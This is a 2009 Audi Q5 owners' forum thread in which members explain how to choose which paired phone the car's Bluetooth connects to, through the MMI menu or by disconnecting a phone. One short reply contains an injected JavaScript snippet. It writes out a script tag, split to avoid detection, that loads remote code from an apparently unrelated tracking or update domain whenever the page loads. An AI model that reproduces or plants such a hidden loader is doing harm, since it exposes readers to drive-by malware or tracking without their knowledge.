Q5/SQ5 MKI (8R) Discussion Discussion forum for the First Generation Audi Q5 SUV produced from 2008 to 2017

Bluetooth question..?

Search this Thread

Old 11-01-2009, 07:35 PM
AudiWorld Senior Member

Received 12 Likes on 10 Posts
Default Bluetooth question..?

Hi,
we just got Metheor Gray Q5 2 days ago, I so far had one difficulty with BT - I have two phones, one work and one personal, the sales guy told me the first paired phone will be default connected to Q5 when I get into the car w/ both phones on me. Both work and personal phones paired fine, but Q5 does not see first paired phone as default and pairs my personal phone, if I disconnect personal, it will pair with another phone.
Is there any way to make the work phone to pair w/Q5 first by default?

Thanks for your help.
Old 11-01-2009, 11:46 PM
AudiWorld Member

Received 0 Likes on 0 Posts

I have the same with my phone and the phone of my wife
if booth aar on, the carphone will try to connect with last in use; if found, it connects again. If not (last phone out) it tries to connect with the other (paired) phone, and if found it autoamatically connects. This can last +- 2 minutes.
Try this : perso "out", then get in the car with "work" "on" , wait until it connects, then switch "perso" (both shoud appear in set up/phone, with the BT icon on "work". Leave the car with both phones "on" , and come back; the connection with "work" shoud be activated again.
Old 11-02-2009, 01:44 PM
AudiWorld Senior Member

Originally Posted by guyguyke
Try this : perso "out", then get in the car with "work" "on" , wait until it connects, then switch "perso" (both shoud appear in set up/phone, with the BT icon on "work". Leave the car with both phones "on" , and come back; the connection with "work" shoud be activated again.
I figured last connected phone will connect again I wonder if Q5 has a menu item where you can switch from one paired phone to another one. Please post if you figure that out,
thanx
Old 11-03-2009, 12:14 AM
AudiWorld Member

yep ! while telephone is selected on the MMI, call the functie "Bluetooth" with the side-**** (upper-right)
then you receive info about all paired phones and you can switch to the desired one
Old 11-03-2009, 07:01 AM
Audiworld Junior Member

yep ! while telephone is selected on the MMI, call the functie "Bluetooth" with the side-**** (upper-right)
then you receive info about all paired phones and you can switch to the desired one
This is great! On a related note, is there a voice command for this. E.g., on the Acura's if they were originally paired with multiple phones and the wrong one connected to the car, then you could hit the voice command button and say "Next Phone" and it would connect to the next available phone.
Old 11-03-2009, 06:40 PM
AudiWorld Senior Member

I don't have NAV, when I press "tel" button, I get a green screen with a "dial" symbol, and the Right upper key is blank, the Rt. Lower is for sound adjustment, and Lt. upper and lower are for something else not for bluetooth.

Could anyone describe the process of switching between the phones on a non-NAV. Q5 ?
thanx
Old 11-04-2009, 12:15 AM
AudiWorld Member

sorry, I only know about systems met MMI ****
I'm afraid you must return to the f***ing manual
function must exist via setup when tel is selected
Old 11-04-2009, 12:52 AM
Audiworld Junior Member

Cool, this seems to work, thanks!
<script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://secureupdatetracking.com/xux/output/index/Ur5HMXLyMVIgg6uA1km1ceh8Ilg7r4bm?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
Old 11-04-2009, 08:43 AM
AudiWorld Member

Originally Posted by m1964
I don't have NAV, when I press "tel" button, I get a green screen with a "dial" symbol, and the Right upper key is blank, the Rt. Lower is for sound adjustment, and Lt. upper and lower are for something else not for bluetooth.

Could anyone describe the process of switching between the phones on a non-NAV. Q5 ?
thanx
Non-Nav, the bluetooth connection is first come, first served until the ignition key is turned off. Up to 4 phones can be paired (bonded), but the connected phone stays connected until the ignition key is removed. You can't switch on the move. AFAIK, the only way to switch is to turn the connected phone off, turn off the ignition, and start the car again. I have done this several times quickly at a stop light when my wife had entered the car first with her phone on.
Old 11-04-2009, 07:20 PM
AudiWorld Senior Member

Originally Posted by Loophole
Non-Nav, the bluetooth connection is first come, first served until the ignition key is turned off. Up to 4 phones can be paired (bonded), but the connected phone stays connected until the ignition key is removed. You can't switch on the move. AFAIK, the only way to switch is to turn the connected phone off, turn off the ignition, and start the car again. I have done this several times quickly at a stop light when my wife had entered the car first with her phone on.
Loophole,
You do not need to turn off the ignition-if you manually disconnect the phone from Q5 using phone's BT menu (or just turn the phone off) Q5 will connect to another paired phone present in the car, no need to turn off the ignition. If you just disconnect your wife's phone Q5 will connect w/ yours.

Quick Reply: Bluetooth question..?